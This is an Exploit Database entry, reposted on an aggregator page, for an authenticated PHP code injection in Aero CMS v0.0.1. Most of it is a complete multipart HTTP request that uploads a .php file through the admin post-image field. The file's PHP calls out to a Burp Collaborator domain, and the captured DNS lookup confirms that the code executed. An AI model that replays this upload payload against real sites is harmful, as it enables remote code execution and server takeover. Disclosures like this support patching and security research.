Aero CMS v0.0.1 – PHP Code Injection (auth)

• Exploit Database
• 13 阅读

• 作者： Hubert Wojciechowski
  日期： 2023-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51085/

• # Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)
  # Date: 15/10/2022
  # Exploit Author: Hubert Wojciechowski
  # Contact Author: hub.woj12345@gmail.com
  # Vendor Homepage: https://github.com/MegaTKC/AeroCMS
  # Software Link: https://github.com/MegaTKC/AeroCMS
  # Version: 0.0.1
  # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  
  ## Example 
  -----------------------------------------------------------------------------------------------------------------------
  Param: image content uploading image
  -----------------------------------------------------------------------------------------------------------------------
  Req
  -----------------------------------------------------------------------------------------------------------------------
  
  POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: pl,en-US;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116
  Content-Length: 1156
  Origin: http://127.0.0.1
  Connection: close
  Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post
  Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  
  -----------------------------369779619541997471051134453116
  Content-Disposition: form-data; name="post_title"
  
  mmmmmmmmmmmmmmmmm
  -----------------------------369779619541997471051134453116
  Content-Disposition: form-data; name="post_category_id"
  
  1
  -----------------------------369779619541997471051134453116
  Content-Disposition: form-data; name="post_user"
  
  admin
  -----------------------------369779619541997471051134453116
  Content-Disposition: form-data; name="post_status"
  
  draft
  -----------------------------369779619541997471051134453116
  Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"
  Content-Type: text/plain
  
  <?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?>
  -----------------------------369779619541997471051134453116
  Content-Disposition: form-data; name="post_tags"
  
  
  -----------------------------369779619541997471051134453116
  Content-Disposition: form-data; name="post_content"
  
  <p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p>
  -----------------------------369779619541997471051134453116
  Content-Disposition: form-data; name="create_post"
  
  Publish Post
  -----------------------------369779619541997471051134453116--
  
  -----------------------------------------------------------------------------------------------------------------------
  Res:
  -----------------------------------------------------------------------------------------------------------------------
  
  The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.